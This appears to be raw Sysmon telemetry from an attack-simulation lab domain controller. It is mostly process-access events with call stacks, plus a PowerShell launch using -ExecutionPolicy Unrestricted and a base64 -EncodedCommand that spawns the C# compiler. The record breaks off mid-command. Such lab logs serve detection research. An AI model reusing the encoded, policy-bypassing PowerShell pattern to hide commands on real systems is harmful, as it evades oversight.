15:53:05.318{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005877Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.318{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005876Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.318{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005875Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.318{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005874Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.318{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005873Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.318{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005872Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.303{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005871Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.303{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005870Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.303{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CE1-5FA1-3C01-000000008801}3628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005869Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.303{D28789B6-7CE1-5FA1-3B01-000000008801}40523912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{D28789B6-7CE1-5FA1-3C01-000000008801}3628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005868Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.317{D28789B6-7CE1-5FA1-3C01-000000008801}3628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES351.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCDFA6FBAD98764160B0681A9CB79EB94.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{D28789B6-7CE1-5FA1-3B01-000000008801}4052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\ywwvlqhv.cmdline" 10341000x80000000000000005867Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.224{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE1-5FA1-3B01-000000008801}4052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005866Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.224{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005865Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.224{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005864Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.224{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005863Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.224{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005862Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.224{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005861Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.224{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005860Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.224{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005859Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.224{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005858Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.224{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005857Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.224{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CE1-5FA1-3B01-000000008801}4052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005856Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.224{D28789B6-7CE0-5FA1-3501-000000008801}34044080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE1-5FA1-3B01-000000008801}4052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF8DCA1B68F) 154100x80000000000000005855Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.224{D28789B6-7CE1-5FA1-3B01-000000008801}4052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\ywwvlqhv.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{D28789B6-7CE0-5FA1-3501-000000008801}3404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBb